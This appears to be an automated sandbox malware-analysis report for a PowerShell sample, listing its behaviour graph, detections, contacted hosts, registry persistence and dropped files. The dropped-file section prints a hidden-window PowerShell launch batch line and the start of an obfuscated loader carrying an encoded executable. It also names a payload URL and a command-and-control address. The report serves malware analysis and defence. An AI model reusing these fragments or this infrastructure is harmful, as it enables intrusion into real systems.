                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture1
                    Ingress Tool Transfer                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeylogging2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Obfuscated Files or Information                    		Cached Domain Credentials23
                    System Information Discovery                    		VNCGUI Input Capture3
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572999 Sample: stage2.ps1 Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 48 res.cloudinary.com 2->48 50 cloudinary.map.fastly.net 2->50 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 10 other signatures 2->66 9 powershell.exe 15 25 2->9         started        14 cmd.exe 1 2->14         started        16 cmd.exe 2->16         started        signatures3 process4 dnsIp5 54 cloudinary.map.fastly.net 151.101.193.137, 443, 49730 FASTLYUS United States 9->54 42 C:\ProgramData\PDF\PDF2.ps1, ASCII 9->42 dropped 44 C:\ProgramData\PDF\1.bat, ASCII 9->44 dropped 70 Creates autostart registry keys with suspicious names 9->70 72 Writes to foreign memory regions 9->72 74 Injects a PE file into a foreign processes 9->74 18 csc.exe 2 9->18         started        21 conhost.exe 9->21         started        76 Suspicious powershell command line found 14->76 23 cmd.exe 1 14->23         started        26 conhost.exe 14->26         started        28 cmd.exe 1 16->28         started        30 conhost.exe 16->30         started        file6 signatures7 process8 dnsIp9 52 102.165.46.145, 333, 49733 RAINBOW-HKRainbownetworklimitedHK South Africa 18->52 68 Suspicious powershell command line found 23->68 32 powershell.exe 13 23->32         started        36 powershell.exe 28->36         started        signatures10 process11 dnsIp12 46 151.101.1.137, 443, 49738, 49739 FASTLYUS United States 32->46 56 Writes to foreign memory regions 32->56 58 Injects a PE file into a foreign processes 32->58 38 csc.exe 1 32->38         started        40 csc.exe 36->40         started        signatures13 process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    stage2.ps111%ReversingLabsWin32.Trojan.Generic
                    stage2.ps113%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cloudinary.map.fastly.net
                    		151.101.193.137
                    		truefalse
                      		high
                      res.cloudinary.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asyn_s8bwjo.txtfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://res.cloudinary.compowershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://cloudinary.map.fastly.netpowershell.exe, 00000000.00000002.1860455437.000001C2B7B48000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://res.cloudinary.compowershell.exe, 00000000.00000002.1860455437.000001C2B7B42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B7A14000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000000.00000002.1860455437.000001C2B6C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1883635223.000001C2C62BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1860455437.000001C2B60D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1860455437.000001C2B5EA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1860455437.000001C2B6267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://res.cloudinary.com/dxtifaxks/raw/upload/v1733864777/asynpowershell.exe, 00000000.00000002.1860455437.000001C2B793B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        151.101.1.137
                                                        		unknownUnited States
                                                        		54113FASTLYUSfalse
                                                        151.101.193.137
                                                        		cloudinary.map.fastly.netUnited States
                                                        		54113FASTLYUSfalse
                                                        102.165.46.145
                                                        		unknownSouth Africa
                                                        		134121RAINBOW-HKRainbownetworklimitedHKtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1572999
                                                        Start date and time:2024-12-11 11:24:07 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 12s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:17
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:stage2.ps1
                                                        Detection:MAL
                                                        Classification:mal100.troj.evad.winPS1@20/13@2/3
                                                        EGA Information:
                                                        • Successful, ratio: 25%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 23
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .ps1
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target csc.exe, PID 3020 because it is empty
                                                        • Execution Graph export aborted for target csc.exe, PID 3156 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        05:24:59API Interceptor137x Sleep call for process: powershell.exe modified
                                                        05:25:16API Interceptor10403970x Sleep call for process: csc.exe modified
                                                        10:25:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D C:\ProgramData\PDF\1.bat
                                                        10:25:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run D C:\ProgramData\PDF\1.bat

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        151.101.1.137nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                          Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                            Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                              Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                  #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                                                                    nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                      1013911.jsGet hashmaliciousFormBookBrowse
                                                                        http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                          https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                            151.101.193.137New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                              greatnew.docGet hashmaliciousRemcosBrowse
                                                                                https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvMGet hashmaliciousUnknownBrowse
                                                                                  https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                    102.165.46.145Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                      aa.LnK.lnkGet hashmaliciousUnknownBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        cloudinary.map.fastly.netnicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.65.137
                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.137
                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                        • 151.101.129.137
                                                                                        PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.129.137
                                                                                        New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 151.101.193.137
                                                                                        NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.65.137
                                                                                        Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.65.137
                                                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        xxx.docGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.137

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        FASTLYUSnicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.65.137
                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.137
                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                        • 151.101.129.137
                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.2.137
                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 151.101.1.108
                                                                                        https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.2.137
                                                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.194.137
                                                                                        EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.137
                                                                                        https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.137
                                                                                        RAINBOW-HKRainbownetworklimitedHKPlugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                        • 102.165.46.145
                                                                                        la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 64.193.205.186
                                                                                        Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 24.233.26.144
                                                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        arm6.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        spc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 85.239.34.134
                                                                                        FASTLYUSnicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                        • 151.101.65.137
                                                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.1.137
                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                        • 151.101.129.137
                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.2.137
                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 151.101.1.108
                                                                                        https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.2.137
                                                                                        Hays eft_Receipt number N302143235953.htmGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.194.137
                                                                                        EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.137
                                                                                        https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.137

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0enicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        Plugin81139.jsGet hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        QUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137
                                                                                        DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 151.101.1.137
                                                                                        • 151.101.193.137

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\PDF\1.bat

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):87
                                                                                        Entropy (8bit):4.903524927696563
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:xFKyAJJFIeUrh5RI8FW5edZkREpV93:xFs8P1PfW5e803
                                                                                        MD5:1CBC85BAE64F53DA87B548571326A3E1
                                                                                        SHA1:A74515A088DB3391ED19A83B5FD47002E986FBC9
                                                                                        SHA-256:48D4BFCBC45665CD7E97DE1D62143AE49376184240993D90D18951DB48E1196D
                                                                                        SHA-512:F8E3FC8B8A21A932EDBBC75B48590F28BF0107930F8B58450C46B2B96D86D5169D06F7A8A0CD2737801E8BB7480BA7FC5D0E88F4B972C8B7EB0769E3663B55A9
                                                                                        Malicious:true
                                                                                        Preview:.CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"..

                                                                                        C:\ProgramData\PDF\PDF2.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with very long lines (65418)
                                                                                        Category:dropped
                                                                                        Size (bytes):946147
                                                                                        Entropy (8bit):2.754767777877841
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:ja3hajoDS2VvhVHzHc4abdm6NNNmy7aBo428Ok8Z3k+:jaEjo22VpJb1abdm6NNNmy7v428M
                                                                                        MD5:8BDC3CCB0FBFDC015E8C18F8E29464E6
                                                                                        SHA1:4EC3326B9ABE35C36478340FB8F9614FEA41A850
                                                                                        SHA-256:1667AD0FC29FCD40AB17963A9BA023626B552FAAEC902E32CFC2B26A9880B0DD
                                                                                        SHA-512:27ACE506208B33C3EF6A981CC21CF05E297C02B7F37E5C31E6F965F8405E7166439F4DE8594DE4686BD6D2E717FEEE0593D1EB64487FDF2296F1760F893407CD
                                                                                        Malicious:true
                                                                                        Preview:.$sZvfP = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'csc.exe';.......$LzWPz = '$$$_$$$';.$sbBkV = 'A';..$ummtu = 'TVqQ$$$_$$$$$$_$$$M$$$_$$$$$$_$$$$$$_$$$$$$_$$$E$$$_$$$$$$_$$$$$$_$$$$$$_$$$//8$$$_$$$$$$_$$$Lg$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$Q$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$g$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$4fug4$$$_$$$t$$$_$$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$BQRQ$$$_$$$$$$_$$$T$$$_$$$ED$$$_$$$PZbJK8$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$$$$_$$$O$$$_$$$$$$_$$$DiEL$$$_$$$V$$$_$$$$$$_$$$$$$_$$$P$$$_$$$D$$$_$$$$$$_$$$$$$_$$$G$$$_$$$$

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\csc.exe.log

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):321
                                                                                        Entropy (8bit):5.36509199858051
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                        MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                        SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                        SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                        SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):11608
                                                                                        Entropy (8bit):4.890472898059848
                                                                                        Encrypted:false
